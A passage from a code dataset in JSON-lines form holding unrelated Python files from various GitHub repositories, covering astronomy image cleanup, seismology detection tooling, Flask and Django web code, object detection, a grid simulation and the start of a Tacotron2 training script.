開3x3檢測鏡\n # 判斷中間的灰階值是否幾乎等於白色,且與周遭的值差距很大(like > 210 or something)\n # 是的話就標記他的座標\n elif STEP == 3:\n la_edge_img = cv2.imread(\"./data_set/img_edge/\"+filename, 0)\n counter = 0\n for i in range(1, img_rows-1):\n for j in range(1, img_cols-1):\n markedImgMap[i, j] = MarkComsic(la_edge_img, i, j)\n # SaveImg(\"./data_set/img_output/\"+filename, markedImgMap)\n # step 4 回到普通圖片,從上往下從左到右把那個區塊磨掉\n # cv2.filter2D(img, -1, kernel)\n origin_image = cv2.imread(\"./data_set/img_with_cosmic/\"+\"data1.png\", 0)\n for i in range(1, img_rows-1):\n for j in range(1, img_cols-1):\n if markedImgMap[i, j] == 1:\n origin_image[i, j] = blurred(origin_image, i, j)\\\n # ----- 成效不佳 -----\n # 用[[2,2,2],[2,0,0],[0,0,0]]的過濾器來處理得到blur1, 對marked2再處理一次得到blur2, blur1比較好\n # # 之後再對2的部分做一是磨平\n # if markedImgMap[i-1, j] != 1:\n # markedImgMap[i-1, j] = 2\n # if markedImgMap[i, j-1] != 1:\n # markedImgMap[i, j-1] = 2\n # if markedImgMap[i+1, j] != 1:\n # markedImgMap[i+1, j] = 2\n # if markedImgMap[i, j+1] != 1:\n # markedImgMap[i, j+1] = 2\n\n # for i in range(1, img_rows-1):\n # for j in range(1, img_cols-1):\n # if markedImgMap[i, j] == 2:\n # origin_image[i, j] = blurred(origin_image, i, j)\n # --------------------\n # 如果對blur1 當作原圖 再從step1跑一次流程,可以得到blur1_round2\n SaveImg(\"./data_set/img_output/\"+\"newImg.png\", origin_image)\n\n # # 二值化\n # ret, th1 = cv2.threshold(la_img, 127, 255, cv2.THRESH_BINARY)\n\n # canny 太銳利 看不到天體或星系星雲了\n # canny_img = cv2.Canny(img, 50, 110)\n\n # cv2.imshow(\"nor\", img)\n # cv2.imshow(\"naga\", NegativeFilm(img_rows, img_cols))\n # cv2.waitKey()\n # cv2.destroyAllWindows()\n","repo_name":"linliu0624/Comsic_Ray_Remove","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23761901075","text":"import numpy as np\nimport math\n\n#\n# Open OPERA map file and read in data\n#\ndata = np.loadtxt('/Users/ekargian/Documents/g-2/Magnets/ElectrostaticQuads/E-field/OPERA-simulations/short_quad_ideal.table', comments='!')\nx=data[:,0]\ny=data[:,1]\nz=data[:,2]\nr=data[:,3]\n# phi=data[:,4] -- unnecessary because not in [0,2pi] - get from y/x instead\nphi = np.arctan2(y,x) # this phi will be within [-pi/2,pi/2] -- will be fixed below\n\nV=data[:,8]\n\n# distance of each \"pole\" in the bipolar coordinate system from origin.\n# defined in cm, same as coordinates in file.\na=5.756 \n\n# toroidal coordinates\nmu = np.arctanh(2*a*r/(r*r+z*z+a*a))\neta = np.arctan(2*a*z/(r*r+z*z-a*a))\n# the above returns eta in [-pi/2,pi/2], fix below\n\nfor i in range(len(eta)):\n sineta = np.sin(eta[i])\n taneta = np.tan(eta[i])\n if sineta>=0:\n if taneta>=0: #1st quadrant\n continue # eta value already should be correct\n else: \n #eta[i]<0, 2nd quadrant\n eta[i] = np.pi + eta[i]\n else:\n if taneta>=0: #eta[i]>0, 3rd quadrant\n eta[i] = np.pi + eta[i]\n else: \n #eta[i]<0, 4th quadrant\n eta[i] = 2*np.pi + eta[i]\n # Lastly, shift phi values to the [0,2pi] range\n if phi[i]<0:\n phi[i] = 2*np.pi + phi[i]\n \n# Open output file\nf= open(\"short_quad_ideal_outererR.dat\",\"w+\")\n\naccepted_entries=0\nfor i in range(len(r)):\n if math.sqrt(math.pow(r[i]-711.2,2)+math.pow(z[i],2))<5.05 and math.sqrt(math.pow(r[i]-711.2,2)+math.pow(z[i],2))>4.995 and abs(V[i])>5000:\n for item in data[i]:\n f.write('%.11E '%item, )\n f.write('%.11E %.11E %.11E\\n'%(mu[i],eta[i],phi[i]))\n accepted_entries += 1\n \nf.close()\nprint('Total accepted entries :: ', accepted_entries)","repo_name":"ManolisKar/Efield_multipoles","sub_path":"macros/parse_file.py","file_name":"parse_file.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17664467363","text":"# create models\nfrom flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nclass User(db.Model):\n __tablename__ = 'users'\n uid = db.Column(db.Integer, primary_key=True, autoincrement=True)\n username = db.Column(db.String(64), unique=True, nullable=False)\n password = db.Column(db.String(128), nullable=False)\n posts = db.relationship('Post', backref='postauth', lazy='dynamic')\n\n def __repr__(self):\n #return '' % self.username\n return '{}'.format(self.username)\n\nclass Followers(db.Model):\n __tablename__ = 'followers'\n fid = db.Column(db.Integer, primary_key=True, autoincrement=True)\n follower_id = db.Column(db.Integer, db.ForeignKey('users.uid'), nullable=False)\n followed_id = db.Column(db.Integer, db.ForeignKey('users.uid'), nullable=False)\n\nclass Post(db.Model):\n __tablename__ = 'posts'\n pid = db.Column(db.Integer, primary_key=True, autoincrement=True)\n author = db.Column(db.Integer, db.ForeignKey('users.uid') , nullable=False)\n content = db.Column(db.String(1024), nullable=False)\n\n#post_descr = db.Table('post_descr',\n# db.Column('user_id', db.Integer, db.ForeignKey('user.id')),\n# db.Column('message_id', db.Integer, db.ForeignKey('message.id')),\n# info={'bind_key': 'users'}\n#)\n\n#class PostDescr(db.Model):\n# __tablename__ = 'postDescr'\n# pid = db.Column(db.Integer, primary_key=True, autoincrement=True)\n# author = db.Column(db.Integer, db.ForeignKey('users.uid') , nullable=False)\n# content = db.Column(db.String(1024), nullable=False)\n# uid = db.Column(db.Integer, primary_key=True, autoincrement=True)\n# username = db.Column(db.String(64), unique=True, nullable=False)\n","repo_name":"nanaoansah/Hwk3_E-14a","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75115186087","text":"import copy\nimport os\nimport numpy as num\nimport logging\n\nfrom pyrocko import util, model, orthodrome, pile\nfrom pyrocko.gui import snuffler\nfrom pyrocko.gui import marker as pmarker\nfrom pyrocko.gui import util as gui_util\nfrom pyrocko.gui.snuffling import Snuffling, Param, Choice, Switch\nfrom silvertine.seiger_lassie import geo, ifc\n\n\nlogger = logging.getLogger('seiger_lassie.snuffling')\n\n\nkind_default = '1 (green)'\n\n\ndef detections_to_event_markers(fn_detections):\n markers = []\n if fn_detections:\n with open(fn_detections, 'r') as f:\n for line in f.readlines():\n data = line.split()\n i, t_d, t_t, apeak, latpeak, lonpeak, xpeak, ypeak, zpeak = \\\n data\n lat, lon = orthodrome.ne_to_latlon(\n float(latpeak), float(lonpeak), float(xpeak), float(ypeak))\n t = util.str_to_time(\"%s %s\" % (t_d, t_t))\n label = \"%s-%s\" % (apeak, i)\n e = model.Event(lat=lat, lon=lon, depth=float(zpeak),\n name=label, time=t)\n m = gui_util.EventMarker(e, kind=int(kind_default[0]))\n markers.append(m)\n\n return markers\n\n\nclass LassieSnuffling(Snuffling):\n\n @property\n def __doc__(self):\n s = '''\n \n \n \n \n \n

Scrutinize Lassie Performance and\n Re-Detect

\n

\n Adjust the detector threshold, press run. From every\n instant, where the signal rises above threshold, a time length\n of tsearch seconds is searched for a maximum. Detections are\n added as event markers to the viewer.

\n\n

\n If you want to save the updated detections, it might be helpful to use\n the marker table\n (see Snuffler\n Tutorial at the bottom) to sort all markers by their kind.\n

\n

Compare Lassie Detections with Reference\n Catalog

\n

\n %s\n

\n \n \n\n ''' % self.show_comparison.__doc__\n return s\n\n def __init__(self):\n Snuffling.__init__(self)\n self.config = None\n self.detections = []\n\n def setup(self):\n if self.config:\n detector_default = self.config.detector_threshold\n else:\n detector_default = 100.\n\n self.set_name('Lassie investigate')\n self.add_parameter(Param('Tsearch', 'tsearch', 20., 0.01, 100))\n self.add_parameter(Param(\n 'Detector threshold', 'detector_threshold', detector_default, 1.,\n 10000.))\n self.add_parameter(Switch('Level Trace', 'level_trace', False))\n self.add_parameter(Switch(\n 'Hold comparison figure', 'hold_figure', False))\n self.add_parameter(Choice(\n 'new marker kind', 'marker_kind', kind_default,\n ['1 (green)', '2 (blue)', '3 (orange)', '4 (purple)', '5 (brown)',\n '0 (red)']))\n self.add_trigger('load reference', self.load_comparison)\n self.add_trigger('show comparison', self.show_comparison)\n self.add_trigger('remove comparison', self.remove_comparison)\n # self.add_trigger('read Lassie config', self.fail)\n self.set_live_update(True)\n self.markers_compare = []\n self.detections = []\n self.fig = None\n self.fframe = None\n self.grid = self.config.get_grid()\n\n def mycleanup(self):\n viewer = self.get_viewer()\n viewer.release_data(self._tickets)\n viewer.remove_markers(self.detections)\n self._tickets = []\n self._markers = []\n\n def call(self):\n self.mycleanup()\n self.detections = []\n i_detection = 0\n zpeak = 0.\n lat = 0.\n lon = 0.\n for traces in self.chopper_selected_traces(\n mode='all',\n trace_selector=lambda x: x.station == \"SMAX\",\n fallback=True):\n tr_smax = [tr for tr in traces if tr.location == '']\n tr_i = [tr for tr in traces if tr.location == 'i']\n if not tr_i:\n tr_i = [None] * len(tr_smax)\n\n for tr_i, tr_stackmax in zip(tr_i, tr_smax):\n tpeaks, apeaks = tr_stackmax.peaks(\n self.detector_threshold, self.tsearch)\n if self.level_trace:\n ltrace = tr_stackmax.copy(data=False)\n ltrace.set_ydata(\n num.ones(\n tr_stackmax.data_len()) * self.detector_threshold)\n self.add_trace(ltrace)\n for t, a in zip(tpeaks, apeaks):\n if tr_i:\n lat, lon, xpeak, ypeak, zpeak = \\\n self.grid.index_to_location(tr_i(t)[1])\n\n lat, lon = orthodrome.ne_to_latlon(\n lat, lon, xpeak, ypeak)\n\n e = model.Event(\n time=t, name=\"%s-%s\" % (i_detection, a), lat=lat,\n lon=lon, depth=zpeak)\n self.detections.append(\n gui_util.EventMarker(\n event=e, kind=int(self.marker_kind[0])))\n i_detection += 1\n self.add_markers(self.detections)\n\n if self.hold_figure:\n self.show_comparison()\n\n def load_comparison(self):\n '''\n For comparison in synthetic tests.\n '''\n fn = self.input_filename(caption='Select an event catalog')\n kind_compare = 4\n compare_events = model.load_events(fn)\n markers = [gui_util.EventMarker(event=e, kind=kind_compare) for e in\n compare_events]\n\n self.markers_compare = markers\n self.add_markers(self.markers_compare)\n\n def remove_comparison(self):\n '''Remove comparison markers from viewer.'''\n self.get_viewer().remove_markers(self.markers_compare)\n\n def filter_visible(self, markers):\n vtmin, vtmax = self.get_viewer().get_time_range()\n return [x for x in markers if vtmin < x.tmin < vtmax]\n\n def show_comparison(self):\n '''\n Iterates through reference catalog and searches for lassie detection\n candidates in a time window of +- 1.5 seconds around the reference.\n\n If multiple candidates are available selects the first as the matching\n lassie detection for this reference.\n\n This option requires the catalog to contain only pyrocko.model.Event\n instances.\n '''\n scan_time = 3.\n # select_by = 'first'\n\n if not self.markers_compare:\n self.fail('No catalog to compare to')\n\n markers_compare = self.filter_visible(self.markers_compare)\n not_detected = []\n detections_success = []\n detections = copy.deepcopy(self.filter_visible(self.detections))\n for i_m, mcompare in enumerate(markers_compare):\n detection_times = num.array([d.tmin for d in detections])\n i_want = num.where(num.abs(detection_times - mcompare.tmin)\n < (scan_time / 2.))[0]\n if len(i_want) == 0:\n not_detected.append(mcompare)\n continue\n\n candidates = [detections[i] for i in i_want]\n\n # if select_by == 'first':\n matched_marker = min(\n candidates, key=lambda x: x.get_event().time)\n\n # elif select_by == 'strongest':\n # matched_marker = max(\n # candidates, key=lambda x: float(x.get_event().name))\n\n detections_success.append((matched_marker, i_m))\n\n for c in candidates:\n detections.remove(c)\n\n if self.hold_figure and self.fframe and not self.fframe.closed:\n self.fig.clf()\n else:\n self.fframe = self.pylab('Lassie', get='figure_frame')\n self.fig = self.fframe.gcf()\n\n ax = self.fig.add_subplot(111)\n compare_events = [x.get_event() for x in markers_compare]\n associated_events = [compare_events[a[1]] for a in detections_success]\n magnitudes = [e.get_event().magnitude for e in markers_compare]\n detected_magnitudes = [e.magnitude for e in associated_events]\n bins = num.linspace(-1, max(magnitudes), 30)\n ax.hist([detected_magnitudes, magnitudes], bins,\n label=['Lassie', 'Reference'], alpha=0.7)\n n_leftover_detections = len(detections)\n n_undetected = len(not_detected)\n\n ax.text(\n 0.05, 0.95, 'Other detections: %s\\nNot detected: %s (%1.1f %%)' %\n (n_leftover_detections, n_undetected,\n (float(n_undetected)/len(markers_compare)*100.)),\n transform=ax.transAxes)\n\n ax.set_xlabel('Magnitude')\n ax.set_ylabel('N detections')\n ax.legend()\n self.fig.canvas.draw()\n\n\ndef __snufflings__():\n return [LassieSnuffling()]\n\n\ndef snuffle(config):\n global _lassie_config\n _lassie_config = copy.deepcopy(config)\n for _ifc in _lassie_config.image_function_contributions:\n _ifc.setup(config)\n\n def load_snuffling(win):\n s = LassieSnuffling()\n s.config = _lassie_config\n s.setup()\n win.pile_viewer.viewer.add_snuffling(s, reloaded=True)\n win.pile_viewer.viewer.add_blacklist_pattern('*.SMAX.i.*')\n for bl in _lassie_config.blacklist:\n win.pile_viewer.viewer.add_blacklist_pattern('%s.*' % bl)\n\n detections_path = _lassie_config.get_detections_path()\n\n if os.path.exists(detections_path):\n s.detections = detections_to_event_markers(detections_path)\n s.add_markers(s.detections)\n\n for _ifc in s.config.image_function_contributions:\n if isinstance(_ifc, ifc.ManualPickIFC):\n markers_path_extra = _ifc.picks_path\n elif isinstance(_ifc, ifc.TemplateMatchingIFC):\n markers_path_extra = _ifc.template_markers_path\n else:\n continue\n\n if os.path.exists(markers_path_extra):\n s.add_markers(pmarker.load_markers(markers_path_extra))\n else:\n logger.warn('No such file: %s (referenced in %s, named %s)' % (\n markers_path_extra, _ifc.__class__.__name__, _ifc.name))\n\n receivers = config.get_receivers()\n stations = set()\n lats, lons = geo.points_coords(receivers, system='latlon')\n for ir, (lat, lon) in enumerate(zip(lats, lons)):\n n, s, l = receivers[ir].codes[:3]\n stations.add(model.Station(\n lat=lat, lon=lon, network=n, station=s, location=l))\n\n paths = config.expand_path(config.data_paths)\n paths.append(config.get_ifm_dir_path())\n\n p = pile.make_pile(paths=paths, fileformat='detect')\n\n meta = {'tabu': True}\n for tr in p.iter_traces(trace_selector=lambda x: x.station == 'SMAX'):\n if tr.meta:\n tr.meta.update(meta)\n else:\n tr.meta = meta\n\n snuffler.snuffle(p, stations=stations,\n launch_hook=load_snuffling)\n\n\n__all__ = [\n 'snuffle']\n","repo_name":"braunfuss/silvertine","sub_path":"src/seiger_lassie/snuffling.py","file_name":"snuffling.py","file_ext":"py","file_size_in_byte":11440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7723887157","text":"from YouTubeSearch.youtube import YoutubeSearch\r\nimport json\r\n\r\n# Search using keywords and on page 2\r\nsearch = YoutubeSearch()\r\nresult = search.search('advanced python tutorial', type='playlist')\r\nif result['success']:\r\n print(json.dumps(result, indent=4))\r\n\r\n# Get information of a video\r\nresult = search.info('https://www.youtube.com/watch?v=dQw4w9WgXcQ')\r\nif result['success']:\r\n print(json.dumps(result, indent=4))\r\n","repo_name":"xenmods/YouTubeSearch","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"33400025817","text":"\"\"\"\nEscape the segfault: the game\n\ndesigned in 2014 by Thomas Iwaszko et al.\nyou can reach me at thomas@gaudia-tech.com\n\"\"\"\n\nfrom Game import Game\n\ng = Game()\ng.run()\ndel g\n","repo_name":"wkta/esc_segfault","sub_path":"run_game.py","file_name":"run_game.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24240298791","text":"import cv2 \r\nimport cvlib as cv\r\nfrom cvlib.object_detection import draw_bbox\r\n\r\n# create a video capture object to open the camera and capture live video\r\nvideo = cv2.VideoCapture(0)\r\n\r\n# create an empty list to store detected object labels\r\nlabels = []\r\n\r\nwhile True:\r\n ret, frame = video.read() # read a frame from the video capture object\r\n\r\n # detect common objects in the frame\r\n # bbox contains the bounding box coordinates of the detected objects\r\n # label contains the class labels or names of the detected objects\r\n # conf contains the confidence levels of the detected objects\r\n bbox, label, conf = cv.detect_common_objects(frame)\r\n\r\n # draw boxes around the detected objects on the frame\r\n output_image = draw_bbox(frame, bbox, label, conf)\r\n\r\n # display the processed frame in a window titled \"Object Detection\"\r\n cv2.imshow(\"Object Detection\", output_image)\r\n\r\n # update the list of detected object labels without duplication\r\n for item in label:\r\n if item in labels:\r\n pass\r\n else:\r\n labels.append(item)\r\n\r\n # break the loop and close the camera window when the spacebar is pressed\r\n if cv2.waitKey(1) & 0xFF == ord(\" \"):\r\n break\r\n\r\ni = 0\r\nnew_sentence = []\r\n\r\n# loop through the detected object labels and creates a sentence to be shown\r\nfor label in labels:\r\n if i == 0:\r\n new_sentence.append(f\"I detected a {label}, and, \")\r\n else:\r\n new_sentence.append(f\"a {label}\")\r\n i += 1\r\n\r\n# print the sentence by joining the words in the new_sentence list\r\nprint(\" \".join(new_sentence))\r\n","repo_name":"shaecodes/Object-Detection","sub_path":"object_detection.py","file_name":"object_detection.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19208462800","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom . import views\n\n\n# Wire up our API using automatic URL routing.\n# Additionally, we include login URLs for the browsable API.\nurlpatterns = [\n path('api/v1/upload_file', views.upload_file, name=\"upload_file\"),\n path('api/v1/all_files', views.all_files, name=\"all_files\"),\n path('api/v1/display_rxtx', views.display_rxtx, name=\"display_rxtx\"),\n path('api/v1/display_rscp', views.display_rscp, name=\"display_rscp\"),\n path('api/v1/display_eclo', views.display_eclo, name=\"display_eclo\"),\n path('api/v1/display_rssi', views.display_rssi, name=\"display_rssi\"),\n path('api/v1/display_kmeans', views.k_means, name=\"k_means\"),\n path('api/v1/get_csv_data', views.get_csv_data, name=\"get_csv_data\")\n\n]","repo_name":"amanjhurani/SGH-Drive_Test_Analysis","sub_path":"backend/bsnl_backend/base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2796299425","text":"import numpy as np\nfrom ...base import fileIO as fio\nfrom ..core.StatArray import StatArray\nfrom ..mesh.TopoRectilinearMesh2D import TopoRectilinearMesh2D\nfrom .Model import Model\n\n\nclass AarhusModel(Model):\n\n def __init__(self):\n \"\"\"Only used to instantiate the class.\n\n Use self.read2D or self.read3D to fill members of the class.\n\n \"\"\"\n self.mesh = None\n self.rho = None\n self.fid = None\n\n\n def pcolor(self, useDOI = True, **kwargs):\n\n if useDOI:\n alpha = np.ones(self.mesh.shape)\n cellId = self.mesh.z.cellIndex(self.doi)\n for i in range(self.mesh.x.nCells):\n alpha[cellId[i]:, i] = 0.0\n kwargs['alpha'] = alpha\n\n self.mesh.pcolor(self.rho, **kwargs)\n\n\n def plotDOI(self, xAxis='x', **kwargs):\n\n xtmp = self.mesh.getXAxis(xAxis, centres=True)\n\n (self.mesh.height.centres - self.doi).plot(x = xtmp, **kwargs)\n\n\n def plotElevation(self, **kwargs):\n self.mesh.plotHeight(**kwargs)\n\n\n def plotXY(self, **kwargs):\n self.mesh.plotXY(**kwargs)\n\n\n def readLineNumbers(self, fileName):\n \"\"\"Read in the line numbers from an inversion file.\n\n Parameters\n ----------\n fileName : str\n Path to the inversion file.\n\n \"\"\"\n\n # Get the total number of points to pre-allocate memory.\n with open(fileName, 'r') as f:\n # Skip the top of the file until we get the column headers\n line = ''\n nHeader = 0\n while not \"LINE\" in line:\n line = f.readline()\n nHeader += 1\n\n header = line.split()[1:]\n\n # We now have the header line, so grab the column indices for what we need\n lineIndex = 0\n\n for i, head in enumerate(header):\n head = head.lower()\n if head == \"line\":\n lineIndex = i\n break\n\n tmp = []\n line = fio.getRealNumbersfromLine(f.readline())\n tmp.append(line[lineIndex])\n\n for line in f:\n l = fio.getRealNumbersfromLine(line)[lineIndex]\n if l != tmp[-1]:\n tmp.append(l)\n\n return np.asarray(tmp)\n\n\n def read2D(self, fileName, lineNumber):\n \"\"\"Read in an inversion file from the Aarhus software\n\n Parameters\n ----------\n fileName : str\n Path to the inversion file.\n index : int\n Index of the line to read in 0 to nLines.\n lineNumber : float\n The line number to read in.\n\n Returns\n -------\n self : TopoRectilinearMesh2D\n The mesh.\n values : geobipy.StatArray\n The values of the model.\n\n \"\"\"\n\n # Get the total number of points to pre-allocate memory.\n nLines = fio.getNlines(fname=fileName)\n\n with open(fileName, 'r') as f:\n # Skip the top of the file until we get the column headers\n line = ''\n nLayers = 0\n nHeader = 0\n while not \"LINE\" in line:\n line = f.readline()\n nHeader += 1\n if \"NUMLAYER\" in line:\n nLayers = np.int(f.readline().split('/')[-1])\n nHeader += 1\n\n nPoints = nLines - nHeader\n\n header = line.split()[1:]\n\n # We now have the header line, so grab the column indices for what we need\n lineIndex = 0\n xIndex = 1\n yIndex = 2\n zIndex = 6\n fidIndex = 3\n rhoIndex = []\n topIndex = []\n doiIndex = None\n\n for i, head in enumerate(header):\n head = head.lower()\n if head == \"line\":\n lineIndex = i\n elif head == \"x\":\n xIndex = i\n elif head == \"y\":\n yIndex = i\n elif head == \"fid\":\n fidIndex = i\n elif head == \"topo\":\n zIndex = i\n elif head == \"doi_lower\":\n doiIndex = i\n\n if \"rho_i\" in head and not \"std\" in head:\n rhoIndex.append(i)\n elif \"dep_top\" in head and not \"std\" in head:\n topIndex.append(i)\n\n # Index arrays are set, pre-allocate memory\n rhoIndex = np.asarray(rhoIndex, dtype=np.int)\n topIndex = np.asarray(topIndex, dtype=np.int)\n\n x = StatArray(nPoints, 'Easting', 'm')\n y = StatArray(nPoints, 'Northing', 'm')\n z = StatArray(nPoints, 'Elevation', 'm')\n fid = StatArray(nPoints, 'Fiducial')\n doi = StatArray(nPoints, 'Depth of investigation', 'm')\n rho = np.zeros([nLayers, nPoints])\n depthEdges = StatArray(nLayers+1, 'Depth', 'm')\n\n # Skip the first data points that are not the line we need\n line = fio.getRealNumbersfromLine(f.readline())\n\n while line[lineIndex] != lineNumber:\n line = fio.getRealNumbersfromLine(f.readline())\n\n # Read in the data points for the requested line,\n # assumes the data points for the given line are contiguous.\n nPoints = 0\n first = True\n while line[lineIndex] == lineNumber:\n if first:\n depthEdges[:-1] = line[topIndex]\n\n x[nPoints] = line[xIndex]\n y[nPoints] = line[yIndex]\n z[nPoints] = line[zIndex]\n fid[nPoints] = line[fidIndex]\n rho[:, nPoints] = line[rhoIndex]\n doi[nPoints] = line[doiIndex]\n\n\n nPoints += 1\n first = False\n line = fio.getRealNumbersfromLine(f.readline())\n\n # Assign the half space depth\n depthEdges[-1] = 1.5 * depthEdges[-2]\n\n\n self.mesh = TopoRectilinearMesh2D(x_centres=x[:nPoints], y_centres=y[:nPoints], z_edges=depthEdges, heightCentres=z[:nPoints])\n self.fid = StatArray(fid[:nPoints], 'Fiducial')\n self.rho = StatArray(rho[:, :nPoints], 'Resistivity', '$\\Omega m$')\n self.doi = StatArray(doi[:nPoints], 'Depth of investigation', 'm')\n\n\n\n def read3D(self, fileName):\n\n NotImplementedError('yet')","repo_name":"DOI-USGS/geobipy","sub_path":"geobipy/src/classes/model/AarhusModel.py","file_name":"AarhusModel.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"18771665943","text":"# pypy 통과 python3 시간초과\n\nimport sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\n\ndef air_cleaner() :\n global R,C,cleaner\n \n x = cleaner # 공기청정기의 위쪽 x좌표\n \n graph[x][0] = 0\n graph[x+1][0] = 0 \n \n # 반시계 방향 바람 불기\n # 아래 방향\n for i in range(x,0,-1) :\n graph[i][0] = graph[i-1][0]\n\n # 왼쪽 방향\n for j in range(0,C-1) :\n graph[0][j] = graph[0][j+1]\n \n # 위 방향\n for i in range(0,x) :\n graph[i][C-1] = graph[i+1][C-1]\n\n # 오른쪽 방향\n for j in range(C-1,1,-1) :\n graph[x][j] = graph[x][j-1]\n graph[x][1] = 0\n\n # 시계방향 바람 불기\n x = x + 1 # 공기청정기 아래 부분으로 이동\n\n # 위방향\n for i in range(x,R-1) : \n graph[i][0] = graph[i+1][0]\n\n # 왼쪽 방향\n for j in range(0,C-1) :\n graph[R-1][j] = graph[R-1][j+1]\n\n # 아래방향\n for i in range(R-1,x,-1) :\n graph[i][C-1] = graph[i-1][C-1]\n\n # 오른쪽 방향\n for j in range(C-1,1,-1) :\n graph[x][j] = graph[x][j-1]\n graph[x][1] = 0\n\n clean = graph[x][0] + graph[x-1][0]\n graph[x][0],graph[x-1][0] = -1,-1\n\n return clean\n\n\n\n\nR,C,T = map(int,input().split())\ngraph = [list(map(int,input().split())) for _ in range(R)]\ncleaner = 0\nfor r in range(R) :\n if graph[r][0] == -1 :\n cleaner = r # 공기청정기 x좌표 저장\n break\n\nt = 0 # 수행 시간\n\ndx = [0,-1,0,1]\ndy = [1,0,-1,0]\n\nwhile True : \n # 1. 미세먼지 확산\n tmp = [[0] * C for _ in range(R)] # 확산된 미세먼지 정보\n for x in range(R) :\n for y in range(C) :\n if graph[x][y] < 5 :\n continue # 퍼질 수 없는 경우\n \n spread = graph[x][y] // 5\n cnt = 0 # 미세먼지가 확산된 위치의 수\n\n for i in range(4) :\n nx = x + dx[i]\n ny = y + dy[i]\n if 0<=nx= T :\n break\n\nprint(remain)","repo_name":"hk-bae/coding-test","sub_path":"study/week3/boj_17144.py","file_name":"boj_17144.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16592303298","text":"# Opens a file named 'input_file_name.txt' in read mode.\r\n# The 'with' statement ensures that the file is properly closed after it is used.\r\nwith open('input_file_name.txt', 'r') as file:\r\n \r\n # Reads all the lines in the file and stores them in a list named 'values'.\r\n # Each line in the file becomes an element in the list.\r\n values = file.readlines()\r\n\r\n# Creates a new list named 'updated_values' that contains modified versions of the strings in the 'values' list.\r\n# Each string is wrapped in single quotes and followed by a comma and a newline character.\r\nupdated_values = [f\"'{value.strip()}',\\n\" for value in values]\r\n\r\n# Opens a file named 'updated_file_name.txt' in write mode.\r\n# The 'with' statement ensures that the file is properly closed after it is used.\r\nwith open('updated_file_name.txt', 'w') as file:\r\n \r\n # Writes the contents of the 'updated_values' list to the file.\r\n # Each element in the list is written as a separate line.\r\n file.writelines(updated_values)\r\n","repo_name":"jsolejr/useful-utilities","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1706451308","text":"import os\nimport cv2\n\ninput_dir = r\"/home/u2004/Desktop/AI_Image_Classification/opencv_create_sample/input_neg\"\nbg_out_path = r\"/home/u2004/Desktop/AI_Image_Classification/opencv_create_sample/output/neg\"\nbg_file_path = r\"/home/u2004/Desktop/AI_Image_Classification/opencv_create_sample/output/bg.txt\"\nbg_counter_file_path = r\"/home/u2004/Desktop/AI_Image_Classification/opencv_create_sample/output/bg_counter.txt\"\n\ndef update_bg(cnt):\n with open(bg_file_path, 'a') as counterFile:\n counterFile.write(str(cnt))\n\ndef update_counter(cnt):\n with open(bg_counter_file_path, 'w') as counterFile:\n counterFile.write(str(cnt))\n\ndef read_counter():\n try:\n with open(bg_counter_file_path, 'r') as counterFile:\n return int(counterFile.read())\n except Exception as error:\n print(error)\n return 0\n\ncounter = read_counter()\nfor root, dirs, files in os.walk(input_dir, topdown=False):\n for name in files:\n dir_ = os.path.join(root, name)\n update_bg(\"neg/\" + str(counter) + \".jpg\" + \"\\n\")\n img = cv2.imread(dir_)\n cv2.imwrite(bg_out_path + \"/\" + str(counter) + \".jpg\", img)\n counter += 1\n update_counter(counter)\n","repo_name":"namnguyendsn/ImageProcessing","sub_path":"opencv_create_sample/output/write_bg.py","file_name":"write_bg.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23172204766","text":"import os\nimport time\nimport torch\nimport argparse\nimport numpy as np\nfrom inference import infer\nfrom utils.util import mode\nfrom hparams import hparams as hps\nfrom torch.utils.data import DataLoader\nfrom utils.logger import Tacotron2Logger\nfrom utils.dataset import ljdataset, ljcollate\nfrom model.model import Tacotron2, Tacotron2Loss\nfrom numpy import finfo\nimport math,random\nfrom inference import *\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '0'\nnp.random.seed(hps.seed)\ntorch.manual_seed(hps.seed)\ntorch.cuda.manual_seed(hps.seed)\n\ndef prepare_dataloaders(fdir):\n\ttrainset = ljdataset(fdir)\n\tcollate_fn = ljcollate(hps.n_frames_per_step)\n\ttrain_loader = DataLoader(trainset, num_workers = hps.n_workers, shuffle = True,\n\t\t\t\t\t\t\t batch_size = hps.batch_size, pin_memory = hps.pin_mem,\n\t\t\t\t\t\t\t drop_last = True, collate_fn = collate_fn)\n\treturn train_loader\n\n\ndef load_checkpoint(ckpt_pth, model, optimizer):\n\tckpt_dict = torch.load(ckpt_pth)\n\tmodel.load_state_dict(ckpt_dict['model'])\n\toptimizer.load_state_dict(ckpt_dict['optimizer'])\n\titeration 